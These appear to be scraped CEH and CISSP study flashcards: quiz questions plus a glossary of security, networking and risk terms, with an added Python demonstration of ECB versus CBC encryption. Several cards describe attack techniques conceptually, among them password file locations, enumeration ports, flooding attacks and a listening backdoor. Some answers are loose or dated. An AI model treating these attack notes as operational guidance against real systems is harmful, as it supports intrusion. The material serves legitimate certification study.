ethical hacking quizzes, CEH ch4, CEH ch5, CEH ch6, CH 4-6 Practice Test, CEH CH 5: Key Terms, Midterm study 2, CISSP Vocabulary
You are about to target a Linux server and would like to attempt access to the passwords. Which of the following folders is where you would find them
/ETC
During enumeration, what port may specifically indicate a portmapper on a Linux computer?
111
During enumeration, what port may specifically indicate portmapper on a Linux computer?
111
Which of the following is not an example of Martian packets?
126.0.0.0
Which of the following matches the common padding found on the end of short Windows LanMan (LM) passwords?
1404EE
How many steps are in the ARP process?
2
Which port on a Microsoft system gives you access to the LDAP service?
389
During enumeration, what port may specifically indicate a Windows computer and most likely not a Linux computer?
445
During enumeration, what port may specifically indicate a Windows computer?
445
Smurf attack
A DDoS attack where an attacker transmits large amounts of ICMP echo request (ping) packets to a targeted IP destination device using the targeted destination's IP source address. This is called spoofing the IP source address. IP routers and other IP devices that respond to broadcasts will respond back to the targeted IP device with ICMP echo replies, thus multiplying the amount of bogus traffic.
SYN flood attack
A DDoS attack where the attacker sends a succession of SYN packets with a spoof address to a targeted destination IP device, but does not send the last ACK packet to acknowledge and confirm receipt. This leaves half-open connections between the client and the server until all resources are absorbed, rendering the server or targeted IP destination device unavailable because of resource allocation to this attack.
Information technology security evaluation criteria (ITSEC)
A European standard that was developed in the 1980s to evaluate confidentiality, integrity, and availability of an entire system.
Bus LAN configuration
A LAN network design that was developed to connect computers used for 10BASE-5 and 10BASE-2 computer networks. All computers and devices are connected along a common bus or single communication line so that transmissions by one device are received by all.
Bridge
A Layer 2 device for passing signals between two LANs or two segments of a LAN.
You have configured a standalone computer to analyze malware. It has port monitors, file monitors, and virtualization installed, and it has no network connectivity. What is this system called?
A SHEEP DIP COMPUTER
Dropper
A Trojan horse or program designed to drop a virus to the infected computer and then execute it.
dropper
A Trojan horse or program designed to drop a virus to the infected computer and then execute it.
Trojan
A Trojan is a program that does something undocumented that the programmer or designer intended, but that the end user would not approve of if he knew about it.
Terminal Access Controller Access Control System (TACACS)
A UDP-based access control protocol that provides authentication, authorization, and accountability.
Uniform resource locator (URL)
A URL is the global address on the Internet and World Wide Web where domain names are used to resolve IP addresses.
Back orifice
A backdoor program, delivered as a Trojan to the end user, that gives the attacker the ability to remotely control the system.
double-blind test
A blind test in which the organization's security team does not know that an attack is coming. Only a few individuals at the organization know about the attack, and they do not share this information with the security team. This test usually requires equal effort for both the testing team and the organization's security team.
Packet or packet data unit (PDU)
A block of data sent over the network that transmits the identities of the sending and receiving stations, for error control.
Enterprise architecture
A blueprint that defines the business structure and operation of the organization.
Administrative law
A body of regulations, rules, orders, and decisions to carry out regulatory powers, created by administrative agencies.
Coaxial cable
A cable composed of an insulated central conducting wire wrapped in another cylindrical conductor (the shield). The whole thing is usually wrapped in another insulating layer and an outer protective layer. A coaxial cable has great capacity to carry vast quantities of information. It is typically used in high-speed data and CATV applications.
Catastrophe
A calamity or misfortune that causes the destruction of facility and data.
Data dictionary
A catalog of all data held in a database, or a list of items giving data names and structures.
Application controls
A category of controls used to verify the accuracy and completeness of records made by manual or automated processes. Controls used for applications include encryption, batch totals, and data input validation.
Repository
A central place where data is stored and maintained. A repository can be a place where multiple databases or files are located for distribution over a network, or it can be a location that is directly accessible to the user without having to travel across a network.
Virus hoax
A chain letter warning of a virus that does not exist, designed to trick you into forwarding it to many other people. The Good Times virus is an example.
Remote Authentication Dial-In User Service (RADIUS)
A client/server protocol and software that allows remote-access servers to communicate. Used in wireless systems such as 802.1x.
Hypertext Markup Language (HTML)
A coding technique used to create documents and web pages for the World Wide Web.
Record
A collection of data items or fields treated as one unit.
Database
A collection of data that is organized and stored on a computer and can be searched and retrieved by a computer program.
Transmission Control Protocol/Internet Protocol (TCP/IP)
A collection of protocols used to provide the basis for Internet and World Wide Web services.
Security kernel
A combination of software, hardware, and firmware that makes up the Trusted Computer Base (TCB). The TCB mediates all access, must be verifiable as correct, and is protected from modification.
Indexed sequential access method (ISAM)
A combination or compromise between indexed blocks of data arranged sequentially within each block; used for storing data for fast retrieval.
Bus
A common shared channel among multiple computer devices.
Post office protocol (POP)
A commonly implemented method of delivering email from the mail server to the client machine. Other methods include IMAP and Microsoft Exchange.
Business impact analysis (BIA)
A component of the business continuity plan. The BIA looks at all the components that an organization relies on for continued functionality. It seeks to distinguish which are more crucial than others and require a greater allocation of funds in the wake of a disaster.
Firmware
A computer program or software stored permanently in PROM or ROM, or semipermanently in EPROM. Software is "burned in" on the memory device so that it is nonvolatile (will not be lost when power is shut off).
Compiler
A computer program that translates a computer program written in one computer language (called the source language) into an equivalent program written in another computer language (called the object, output, or target language).
virus
A computer program with the capability to generate copies of itself and thereby spread. Viruses require the interaction of an individual to activate and can have rather benign results, such as flashing a message to the screen, or rather malicious results that destroy data, systems, integrity, or availability.
Virus
A computer program with the capability to generate copies of itself and thereby spread. Viruses usually require the interaction of an individual and can have rather benign results, such as flashing a message to the screen, or rather malicious results that destroy data, systems, integrity, or availability.
Dumb terminal
A computer workstation or terminal that consists of a keyboard and screen, but with no processor of its own. It sends and receives its data to and from a large central computer or server.
User datagram protocol (UDP)
A connectionless protocol that provides very few error recovery services, but offers a quick and direct way to send and receive datagrams.
Baseline
A consistent or established base used to establish a minimum acceptable level of security.
Outsourcing
A contract arrangement between a third party and the organization for services such as web hosting, application development, or data processing.
Service level agreement (SLA)
A contractual agreement between an organization and its service provider. SLAs define and protect the organization in regard to holding the service provider accountable for the requirements as defined in the agreement.
Time-to-live (TTL)
A counter used within an IP packet that specifies the maximum number of hops that a packet can traverse. When a TTL is decremented to zero, a packet expires.
Steganography
A cryptographic method of hiding the existence of a message. A commonly used form places information in pictures.
Hash
A cryptographic sum considered a one-way value. A hash is considerably shorter than the original text and can be used to uniquely identify it. You might have seen a hash value next to applications available for download on the Internet. By comparing the hash of the application with the one on the application vendor's website, you can make sure that the file has not been changed or altered. MD5 and SHA-1 are examples of hashing algorithms.
Packet switching
A data transmission method that divides messages into standard-sized packets for greater efficiency in routing and transporting them through a network.
Hierarchical database
A database organized in a tree structure, in which each record has one owner. Navigation to individual records takes place through predetermined access paths.
Last in first out (LIFO)
A data-processing method that applies to buffers. The last item in the buffer is the first to be removed.
Risk avoidance
A decision to take action to avoid a risk.
Procedure
A detailed, in-depth, step-by-step document that lays out exactly what is to be done and how it is to be accomplished.
Uninterruptible power supply (UPS)
A device designed to provide a backup power supply during a power failure. Basically, a UPS is a battery backup system with an ultra-fast sensing device.
Gateway
A device that allows for the translation and management of communication between networks that use different protocols or designs. Can also be deployed in a security context to control sensitive traffic.
Router
A device that determines the next network point to which a data packet should be forwarded en route toward its destination. The router is connected to at least two networks and determines which way to send each data packet based on its current understanding of the state of the networks it is connected to. Routers create or maintain a table of the available routes and use this information to determine the best route for a given data packet. Routing occurs at Layer 3 (network layer) of the OSI seven-layer model.
Arithmetic logic unit (ALU)
A device used for logical and arithmetic operations within a computer.
Hub
A device used for physical connectivity in networks. It provides connectivity, amplification, and signal regeneration.
Certificate
A digital certificate is a file that uniquely identifies its owner. A certificate contains owner identity information and its owner's public key. Certificates are created by the certificate authority.
Business case
A document developed to establish the merits and desirability of a project. This is the information necessary to enable.
IT security architecture and framework
A document that defines the policies, standards, procedures, and guidelines for information security.
Single loss expectancy (SLE)
A dollar value figure that represents an organization's loss from a single loss or loss of this particular IT asset.
fuzz testing
A dynamic testing tool that provides input to the software to test the software's limits and discover flaws. The input provided can be randomly generated by the tool or specially created to test for known vulnerabilities.
Password authentication protocol (PAP)
A form of authentication in which clear text usernames and passwords are passed.
Hardware keystroke logger
A form of key logger that is a hardware device. When placed in the system it is hard to detect without a physical inspection. It may be plugged into the keyboard connector or can be built into the keyboard.
Packet filter
A form of stateless inspection performed by some firewalls and routers.
Infrastructure mode
A form of wireless networking in which wireless stations communicate with each other by first going through an access point.
Bell-LaPadula
A formal model based on confidentiality. It is defined by two basic properties: the Simple Security Property (ss Property), which states that a subject at one level of confidentiality is not allowed to read information at a higher level of confidentiality (sometimes referred to as "no read up"); and the Star (*) Security Property, which states that a subject at one level of confidentiality is not allowed to write information to a lower level of confidentiality (also known as "no write down").
Annualized loss expectancy (ALE)
A formula used to calculate a quantifiable measurement of the impact that a threat will have on an organization if it occurs. ALE is used to calculate the possible loss that could occur over a one-year period. The formula is SLE * ARO = ALE.
Heuristic scanning
A form of virus scanning that looks at irregular activity by programs. As an example, a heuristic scanner would flag a word processing program that attempted to format the hard drive, as that is not normal activity.
Hot site
A fully prepared and configured site that is ready for use.
IT infrastructure
A general term to encompass all information technology assets (hardware, software, data), components, systems, applications, and resources.
Red team
A group of ethical hackers who help organizations to explore network and system vulnerabilities by means of penetration testing.
Local area network (LAN)
A group of wired or wireless computers and associated devices that share a common communications line and typically share the resources of a single processor or server within a small geographic area (for example, within an office building).
NIST SP 800-92
A guide to computer security log management.
NIST SP 800-137
A guide to information security continuous monitoring (ISCM) for federal information systems and organizations.
Email bomb
A hacker technique that floods the email account of the victim with useless emails.
Personal digital assistant (PDA)
A handheld device that combines computing, telephone/fax, and networking features. A typical PDA can function as a cellular phone, fax sender, and personal organizer. Many PDAs incorporate handwriting and/or voice-recognition features. PDAs also are called palmtops, handheld computers, and pocket computers.
Paper shredder
A hardware device used for destroying paper and documents by shredding to prevent dumpster diving.
Sniffers
A hardware or software device that can be used to intercept and decode network traffic.
Sniffer
A hardware or software device that can be used to intercept and decode network traffic.
MD5
A hashing algorithm that produces a 128-bit output.
SHA-1
A hashing algorithm that produces a 160-bit output.
Bollard
A heavy round post used to prevent automobiles from ramming buildings or breaching physical security.
Domain name system (DNS)
A hierarchy of Internet servers that translate alphanumeric domain names into IP addresses and vice versa. Because domain names are alphanumeric, it's easier to remember these names than IP addresses.
File server
A high-capacity disk storage device, or a computer, that each computer on a network can access to store and retrieve files shared among the attached computers. The file server software can be configured to accept (or refuse) requests from programs running on other computers to access its files.
Policy
A high-level document that dictates management intentions toward security.
Storage area network (SAN)
A high-speed subnetwork that interconnects different data-storage devices with associated data servers for a large network. SANs support disk mirroring, backup and restore, archival and retrieval of archived data, data migration from one storage device to another, and the sharing of data among different servers in a network.
Intrusion detection
A key component of security that includes prevention, detection, and response. It is used to detect anomalies or known patterns of attack.
Massive array of inactive disks (MAID)
A large array of hard drives that are kept inactive until needed.
Why is a SYN flood attack detectable?
A large number of SYN packets will appear on the network without the corresponding reply.
Internet engineering task force (IETF)
A large open, international community of network designers, operators, vendors, and researchers concerned with the evolution of the Internet architecture and the smooth operation of the Internet. It is open to any interested individual. The IETF is the protocol-engineering and development arm of the Internet.
Lattice-based access control (LBAC)
A lattice-based access-control model was developed to deal with confidentiality and integrity. It places an upper and lower boundary on subjects and objects.
Civil law
A law that usually pertains to the settlement of disputes between individuals, organizations, or groups, and having to do with the establishment, recovery, or redress of private and civil rights. Civil law is not criminal law. It is also called tort law and is mainly for redress or recovery related to wrongdoing.
Combination lock
A lock that can be opened by turning dials in a predetermined sequence.
Data structure
A logical relationship among data elements that is designed to support specific data-manipulation functions.
Frame
A logical structure in which data can be placed.
Which of the following is best when selecting a biometric system?
A low crossover error rate
Algorithm
A mathematical procedure used for solving a problem. Commonly used in cryptography.
Mandatory access control (MAC)
A means of restricting access to objects based on the sensitivity (as represented by a label) of the information contained in the objects and the formal authorization (such as clearance) of subjects to access information of such sensitivity.
Compact disc (CD)
A means of storing video, audio, and data on an optical disk. CDs were originally designed for digital audio music.
Fiber-optic cable
A medium for transmission comprised of many glass fibers. Light-emitting diodes or lasers send light through the fiber to a detector that converts the light back to an electrical signal for interpretation. Advantages include huge bandwidth, immunity to electromagnetic interference, and the capability to traverse long distances with minimal signal degradation.
Security bulletin
A memorandum or message from a software vendor or manufacturer documenting a known security defect in the software or application itself. Security bulletins are typically accompanied with instructions for loading a software patch to mitigate the security defect or software vulnerability.
Cookies
A message from a website given to an individual's web browser on the workstation device. The workstation browser stores this text message in a text file. The message is sent back to the web server each time that the browser goes to that website.
System development life cycle (SDLC)
A method for developing information systems. It has five main stages: analysis, design, development, implementation, and evaluation. Each stage has several components; for example, the development stage includes programming (coding, including internal documentation, debugging, testing, and documenting) and acquiring equipment (selection, acquisition [purchase or lease], and testing).
Extensible authentication protocol (EAP)
A method of authentication that can support multiple authentication methods such as tokens, smart cards, certificates, and one-time passwords.
Brute-force attack
A method of breaking a cipher or encrypted value by trying a large number of possibilities. Brute-force attacks function by working through all possible values. The feasibility of brute-force attacks depends on the key length and strength of the cipher and the processing power available to the attacker.
Synchronous transmission
A method of communication in which data is sent in blocks, without the need for start and stop bits between each byte. Synchronization is achieved by sending a clock signal along with the data and by sending special bit patterns to denote the start of each block.
Rounding down
A method of computer fraud that involves rounding down dollar amounts so that small amounts of money are stolen. As an example, the value $1,199.50 might be rounded down to $1,199.00.
Network address translation (NAT)
A method of connecting multiple computers to the Internet using one IP address so that many private addresses are being converted to a single public address.
MAC filtering
A method of controlling access on a wired or wireless network by denying access to any device whose MAC address does not match one on a pre-approved list.
First in First out (FIFO)
A method of data and information storage in which the data stored for the longest time will be retrieved first.
Penetration test
A method of evaluating the security of a network or computer system by simulating an attack by a malicious hacker but without doing harm and with the owner's consent.
Piggybacking
A method of gaining unauthorized access into a facility by following an authorized employee through a controlled access point or door.
TEMPEST
A method of shielding equipment to prevent the capability of capturing and using stray electronic signals and reconstructing them into useful intelligence.
Biometrics
A method of verifying a person's identity for authentication by analyzing a unique physical attribute of the individual, such as a fingerprint, retinal scan, or palm print.
Authentication
A method that enables you to identify someone. Authentication verifies the identity and legitimacy of the individual to access the system and its resources. Common authentication methods include passwords, tokens, and biometric systems.
Pattern matching
A method used by IDS systems to identify malicious traffic. It is also called signature matching and works by matching traffic against signatures stored in a database.
Vulnerability assessment
A methodical evaluation of an organization's IT weaknesses of infrastructure components and assets and how those weaknesses can be mitigated through proper security controls and recommendations to remediate exposure to risks, threats, and vulnerabilities.
Quantitative risk assessment
A methodical, step-by-step calculation of asset valuation, exposure to threats, and the financial impact or loss in the event of the threat being realized.
Parallel testing
A mode of testing in which a stream of data is fed into two systems to allow processing by both so that the results can be compared.
Disaster
A natural or man-made event that can include fire, flood, storm, and equipment failure that negatively affects an industry or facility.
Repeater
A network device used to regenerate or replicate a signal. Repeaters are used in transmission systems to regenerate analog or digital signals distorted by transmission loss.
Intrusion Detection System
A network monitoring device usually installed at Internet ingress/egress points used to inspect inbound and outbound network activity and identify suspicious patterns that might indicate a network or system attack from someone attempting to break in to or compromise a system.
Ethernet
A network protocol defining a specific implementation of the physical and data link layers in the OSI model (IEEE 802.3). Ethernet is a local area network that uses a bus topology and provides reliable high-speed communications (maximum of 100 million bps) in a limited geographic area (such as an office complex or university complex).
Intrusion detection system (IDS)
A network-monitoring device typically installed at Internet ingress/egress points used to inspect inbound and outbound network activity and identify suspicious patterns that might indicate a network or system attack from someone attempting to break into or compromise a system.
Source code
A nonexecutable program written in a high-level language. A compiler or assembler must translate the source code into an object code (machine language) that the computer can understand.
Decision support system (DSS)
A now-superseded term for a software application that analyzes business data and presents it so that users can make business decisions more easily.
Initial sequence number
A number defined during a TCP startup session.
Quantitative analysis
A numerical evaluation and analysis based on monetary or dollar valuation as part of the evaluation or analysis.
Turnstile
A one-way gate or access control mechanism used to limit traffic and control the flow of people.
Passive (OS) fingerprint
A passive method of identifying the OS of a targeted computer or device. No traffic or packets are injected into the network; attackers simply listen to and analyze existing traffic.
Database administrator (DBA)
A person (or group of people) responsible for the maintenance activities of a database, including backup and recovery, performance, and design.
Feasibility study
A phase of an SDLC methodology that researches the feasibility and adequacy of resources for the development or acquisition of a system solution for a user's need.
Backdoor
A piece of software that allows access to a computer without using the conventional security procedures. Backdoors are often associated with Trojans.
backdoor
A piece of software that allows access to a computer without using the conventional security procedures. Backdoors are often associated with Trojans.
Program evaluation and review technique (PERT)
A planning and control tool representing, in diagram form, the network of tasks required to complete a project, establishing sequential dependencies and relationships among the tasks.
Acceptable use policy (AUP)
A policy that defines what employees, contractors, and third parties are authorized to do on the organization's IT infrastructure and its assets. AUPs are common for access to IT resources, systems, applications, Internet access, email access, and so on.
IANA
A primary governing body for Internet networking. IANA oversees three key aspects of the Internet: top-level domains (TLDs), IP address allocation, and port number assignments. IANA is tasked with preserving the central coordinating functions of the Internet for the public.
Extranet
A private network that uses Internet protocols and the public telecommunication system to securely share part of a business's information or operations with suppliers, vendors, partners, customers, or other businesses. An extranet can be viewed as part of a company's intranet extended to users outside the company. An extranet requires security and privacy.
Virtual private network (VPN)
A private network that uses a public network to connect remote sites and users.
Risk assessment
A process for evaluating the exposure or potential loss or damage to the IT and data assets for an organization.
Principle of deny all
A process of securing logical or physical assets by first denying all access and then allowing access only on a case-by-case basis.
trojan
A program disguised as legitimate software but designed to covertly do something malicious or nefarious.
Assembler
A program that converts the assembly language of a computer program into the machine language of the computer.
information security continuous monitoring (ISCM)
A program that involves maintaining ongoing awareness of information security, vulnerabilities, and threats to support organizational risk management decisions.
Key exchange protocol
A protocol used to exchange secret keys for the facilitation of encrypted communication. Diffie-Hellman is an example of a key exchange protocol.
Downtime report
A record that tracks the amount of time that a computer or device is not operating because of a hardware or software failure.
log
A recording of events that occur on an organizational asset, including systems, networks, devices, and facilities. Each entry in a log covers a single event that occurs on the asset.
Exception report
A report that uses data selection based on a very specific set of circumstances to identify process exceptions. Reports that identify items with negative on-hand quantities or locations with more than one item stored in them are examples of exception reports.
Asymmetric algorithm
A routine that uses a pair of different but related cryptographic keys to encrypt and decrypt data.
Open shortest path first (OSPF)
A routing protocol that determines the best path for routing IP traffic over a TCP/IP network. It uses less router-to-router update traffic than the RIP protocol that it has been designed to replace.
Qualitative risk assessment
A scenario-based assessment in which one scenario is examined and assessed for each critical or major threat to an IT asset.
Challenge handshake authentication protocol (CHAP)
A secure method for connecting to a system. CHAP functions as follows: 1. After the authentication request is made, the server sends a challenge message to the requestor. The requestor responds with a value obtained by using a one-way hash. 2. The server then checks the response by comparing the received hash to one calculated locally by the server. 3. If the values match, the authentication is acknowledged; otherwise, the connection is terminated.
White box
A security assessment or penetration test in which all aspects of the network are known.
White box testing
A security assessment or penetration test in which all aspects of the network are known.
Required vacations
A security control used to uncover misuse or illegal activity by requiring employees to use their vacation.
Security countermeasure
A security hardware or software technology solution that is deployed to ensure the confidentiality, integrity, and availability of IT assets that need protection.
Rotation of assignment
A security mechanism that moves employees from one job to another so that one person does not stay in one position forever. This makes it harder for an employee to hide malicious activity.
Ethical hacker
A security professional who legally attempts to break into a computer system or network to find its vulnerabilities.
Wi-Fi protected access (WPA)
A security standard for wireless networks designed to be more secure than WEP. Developed from the draft 802.11i standard.
Worm
A self-replicating program that spreads by inserting copies of itself into other executable codes, programs, or documents. Worms typically flood a network with traffic and result in a denial of service.
worm
A self-replicating program that spreads by inserting copies of itself into other executable codes, programs, or documents. Worms typically flood a network with traffic and result in a denial of service.
Binary code
A sequence of 0s and 1s used by computer systems as the basis of communication.
Encryption key
A sequence of characters used by an encryption algorithm to encrypt plain text into cipher text.
Radio frequency identification (RFID)
A set of components that include a reader and a small device referred to as a tag. The tag can be used to hold information for inventory, management, tracking, or other purposes. RFID provides a method to transmit and receive data over a short range from one point to another.
Methodology
A set of documented procedures used for performing activities in a consistent, accountable, and repeatable manner.
Protocol
A set of formalized rules that describe how data is transmitted over a network. Low-level protocols define the electrical and physical standard, whereas high-level protocols deal with formatting of data. TCP and IP are examples of high-level LAN protocols.
Audit trail
A set of records that collectively provide documentary evidence of processing used to aid in tracing from original transactions forward to related records and reports, and/or backward from records and reports to their component source transactions.
Application programming interface (API)
A set of system-level routines that can be used in an application program for tasks such as basic input/output and file management. In a graphics-oriented operating environment such as Microsoft Windows, high-level support for video graphics output is part of the Windows graphical API.
Applet
A small Java program that can be embedded in an HTML page. Applets differ from full-fledged Java applications in that they are not allowed to access certain resources on the local computer, such as files and serial devices (modems, printers, and so on), and are prohibited from communicating with most other computers across a network. The current rule is that an applet can make an Internet connection only to the computer from which the applet was sent.
tini
A small Windows backdoor (about 3 KB) that listens on TCP port 7777 and gives a remote command shell to whoever connects.
Application
A software program designed to perform a specific task or group of tasks, such as word processing, communications, or database management.
Universal serial bus (USB)
A specification standard for connecting peripherals to a computer. It can connect up to 127 devices to a computer. The original USB 1.1 specification transfers data at a maximum of 12 Mbps; later versions are considerably faster.
American standard code for information interchange (ASCII)
A standard code for transmitting data, consisting of 128 letters, numerals, symbols, and special codes, each of which is represented by a unique binary number. ASCII is a 7-bit code; an ASCII character is normally stored in an 8-bit byte with the high bit unused.
Utility programs
A standard set of routines that assist in the operation of a computer system by performing some frequently required process, such as copying, sorting, or merging.
Benchmark
A standard test or measurement that compares the performance of similar components or systems.
Software vulnerability standard
A standard that accompanies an organization's vulnerability assessment and management policy. This standard typically defines the organization's vulnerability window definition and how the organization is to provide software vulnerability management and software patch management throughout the enterprise.
Off-site storage
A storage facility that is not located at the organization's primary facility. The idea behind off-site storage is to protect information from damage that might occur at the primary facility. Off-site storage facilities are used to store computer media, backup data, and files.
Message switching
A strategy that enables communication channels to be used simultaneously by more than one node. At each transfer point in the connection, incoming data is stored in its entirety and then forwarded to the next point. This process continues until the data reaches its destination.
Capability maturity model (CMM)
A structured model designed by Carnegie Mellon's Software Engineering Institute to improve and optimize the software development life cycle.
Impact assessment
A study of the potential future effects of a development project on current projects and resources. The resulting document should list the pros and cons of pursuing a specific course of action.
Help desk
A support system designed to assist end users with technical and functional questions and problems. Also serves as technical support for hardware and software. Help desks are staffed by people who can either solve the problem directly or forward the problem to someone else. Help desk software provides the means to log problems and track them until solved. It also gives management information regarding support activities.
Electronic code book (ECB)
A mode of operation for block ciphers such as DES and AES, not a cipher in its own right. Each block is encrypted independently with the same key, so the same plain-text block always produces the same cipher-text block. ECB is considered the weakest mode because repeated blocks and patterns in the plain text remain visible in the cipher text.
Blowfish
A symmetric block cipher designed by Bruce Schneier in 1993. It uses a 64-bit block and a variable-length key of up to 448 bits.
Rijndael
A symmetric block cipher designed by Joan Daemen and Vincent Rijmen and chosen to be the Advanced Encryption Standard (AES). AES uses a 128-bit block with 128-, 192-, or 256-bit keys.
Data encryption standard (DES)
A symmetric encryption standard based on a 64-bit block. DES processes 64 bits of plain text at a time to output 64-bit blocks of cipher text. DES uses a 56-bit key and was standardized with four modes of operation (ECB, CBC, CFB, and OFB). Because a 56-bit key can be brute forced with modern hardware, DES is considered broken and 3DES (or, preferably, AES) is used instead.
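To make the ECB weakness described above concrete, here is an added example (not part of the original glossary) that encrypts the same plain text in ECB mode and in CBC mode over a 64-bit block cipher and counts repeated cipher-text blocks. It uses XTEA rather than DES only because XTEA fits in a few lines; the block size is the same 64 bits. Key, IV and plain text are constructed for the demonstration.

```python
import struct

# Added example (not from the original glossary): ECB versus CBC over XTEA,
# a 64-bit block cipher like DES. Key, IV and plaintext are constructed here.

MASK32 = 0xFFFFFFFF
DELTA = 0x9E3779B9
BLOCK = 8  # bytes per block


def xtea_encrypt_block(key: bytes, block: bytes) -> bytes:
    """XTEA: 32 rounds, 128-bit key, 64-bit block."""
    k = struct.unpack(">4L", key)
    v0, v1 = struct.unpack(">2L", block)
    s = 0
    for _ in range(32):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK32
        s = (s + DELTA) & MASK32
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK32
    return struct.pack(">2L", v0, v1)


def xtea_decrypt_block(key: bytes, block: bytes) -> bytes:
    k = struct.unpack(">4L", key)
    v0, v1 = struct.unpack(">2L", block)
    s = (DELTA * 32) & MASK32
    for _ in range(32):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK32
        s = (s - DELTA) & MASK32
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK32
    return struct.pack(">2L", v0, v1)


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _blocks(data: bytes):
    if len(data) % BLOCK:
        raise ValueError("input must be a whole number of 8-byte blocks (pad first)")
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key: bytes, data: bytes) -> bytes:
    # Each block is encrypted on its own: equal plaintext blocks -> equal ciphertext.
    return b"".join(xtea_encrypt_block(key, b) for b in _blocks(data))


def ecb_decrypt(key: bytes, data: bytes) -> bytes:
    return b"".join(xtea_decrypt_block(key, b) for b in _blocks(data))


def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    # Each plaintext block is XORed with the previous ciphertext block (the IV
    # for the first one), so repeated plaintext no longer repeats in the output.
    out, prev = [], iv
    for b in _blocks(data):
        prev = xtea_encrypt_block(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for c in _blocks(data):
        out.append(_xor(xtea_decrypt_block(key, c), prev))
        prev = c
    return b"".join(out)


def repeated_blocks(ciphertext: bytes) -> int:
    """Number of ciphertext blocks that duplicate an earlier block (the ECB leak)."""
    blocks = _blocks(ciphertext)
    return len(blocks) - len(set(blocks))


def compare_modes(key: bytes, iv: bytes, plaintext: bytes):
    """(repeats under ECB, repeats under CBC) for the same key and plaintext."""
    return repeated_blocks(ecb_encrypt(key, plaintext)), repeated_blocks(cbc_encrypt(key, iv, plaintext))


if __name__ == "__main__":
    key, iv = bytes(range(16)), b"\x01" * 8      # constructed; use random values in practice
    pt = b"ATTACK AT DAWN!!" * 4                  # 64 bytes = 8 blocks, only 2 distinct
    print("repeated blocks (ECB, CBC):", compare_modes(key, iv, pt))
```

With the constructed plain text, ECB leaks that six of the eight blocks are copies of earlier ones; CBC output shows no repeats, which is the reason ECB is avoided for anything longer than a single block.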
Nonrepudiation
A system or method put in place to ensure that an individual cannot deny his own actions.
Business continuity planning (BCP)
A system or methodology to create a plan for how an organization will resume partially or completely interrupted critical functions within a predetermined time after a disaster or disruption occurs. The goal is to keep critical functions operational.
Closed system
A system that is not "open" and, therefore, is a proprietary system. Open systems are those that employ modular designs, are widely supported, and facilitate multi-vendor, multi-technology integration.
Integrated services digital network (ISDN)
A system that provides simultaneous voice and high-speed data transmission through a single channel to the user's premises. ISDN is an international standard for end-to-end digital transmission of voice, data, and signaling.
File allocation table (FAT)
A table or list maintained by an operating system to keep track of the status of various segments of disk used for file storage.
Certification
A technical evaluation of the system that can be carried out by independent security teams or by the existing staff.
Digital watermark
A technique that adds hidden copyright information to a document, picture or sound file.
Just a bunch of disks (JBOD)
A technique that is somewhat like RAID in that two or more hard drives are combined into one storage array. However, JBOD offers none of the fault tolerance advantages of RAID.
Bayesian filter
A technique used to detect spam. Bayesian filters give a score to each message based on the words and numbers in a message. They are often employed by antispam software to filter spam based on probabilities. Messages with high scores are flagged as spam and can be discarded, deleted, or placed in a folder for review.
Kilo lines of code (KLOC)
A technique used to determine the cost of software development based solely on the length of code.
Internet Protocol spoofing (IP spoofing)
A technique in which the attacker forges the source IP address of packets so that they appear to come from a trusted host. It is used to gain unauthorized access to computers or in denial-of-service attacks (for example, to hide the attacker or to direct reply traffic at a victim). Ingress and egress filtering on modern routers and firewalls can offer protection against IP spoofing.
Direct-sequence spread spectrum (DSSS)
A technique used by wireless devices to spread the transmitted signal across a wider frequency band by combining the data with a faster pseudorandom chipping code; the signal is harder to jam and appears as noise to a receiver that does not know the code.
Tunneling
A technology that enables one network to send its data via another network's connections. Tunneling works by encapsulating a network protocol within packets carried by the second network. For example, Microsoft's PPTP technology enables organizations to use the Internet to transmit data across a VPN. It does this by embedding its own network protocol within the TCP/IP packets carried by the Internet. Tunneling is also called encapsulation. Can also be used covertly, as with STUNNEL and other programs.
Channel service unit/digital service unit (CSU/DSU)
A telecommunications device used to terminate telephone company equipment, such as a T1, and prepare data for router interface at the customer's premises.
Cracker
A term derived from "criminal hacker," someone who acts in an illegal manner.
Audit
A term that typically accompanies an accounting or auditing firm that conforms to a specific and formal methodology and definition for how an investigation is to be conducted with specific reporting elements and metrics being examined (such as a financial audit according to Public Accounting and Auditing Guidelines and Procedures).
Ethical hack
A term used to describe a type of hack done to help a company or individual identify potential threats on the organization's IT infrastructure or network. Ethical hackers must obey the rules of engagement, do no harm, and stay within legal boundaries.
Botnet
A collection of compromised computers (bots, or robots) that an attacker controls remotely through a command-and-control channel, typically to send spam or launch DDoS attacks.
target test
A test in which both the testing team and the organization's security team are given maximum information about the network and the type of test that will occur. This is the easiest test to complete but does not provide a full picture of the organization's security.
full-knowledge test
A test in which the testing team is provided with all available knowledge regarding the organization's network. This test is focused more on what attacks can be carried out.
blind test
A test in which the testing team is provided with limited knowledge of the network systems and devices using publicly available information. The organization's security team knows that an attack is coming. This test requires more effort by the testing team, and the testing team must simulate an actual attack.
zero-knowledge test
A test in which the testing team is provided with no knowledge regarding the organization's network. The testing team can use any means available to obtain information about the organization's network. This is also referred to as closed- or black-box testing.
partial-knowledge test
A test in which the testing team is provided with public knowledge regarding the organization's network. Boundaries might be set for this type of test.
penetration test
A test that simulates an attack to identify any risks that can stem from the vulnerabilities of a system or device.
Diskless workstation
A thin client that has no hard drive or local operating system. The system boots from a centralized server and stores files on a network file server.
TCP handshake
A three-step (SYN, SYN/ACK, ACK) process computers go through when negotiating a connection with one another. The process is a target of attackers and others with malicious intent.
keylogger (keystroke logger)
A tool that an attacker uses to capture user keystrokes in a system to steal sensitive data (including credentials). There are two main types of keyloggers: keylogging hardware devices and keylogging software. A hardware (physical) keylogger is usually a small device that can be placed between a user's keyboard and the main system. Software keyloggers are dedicated programs designed to track and log user keystrokes.
Ring topology
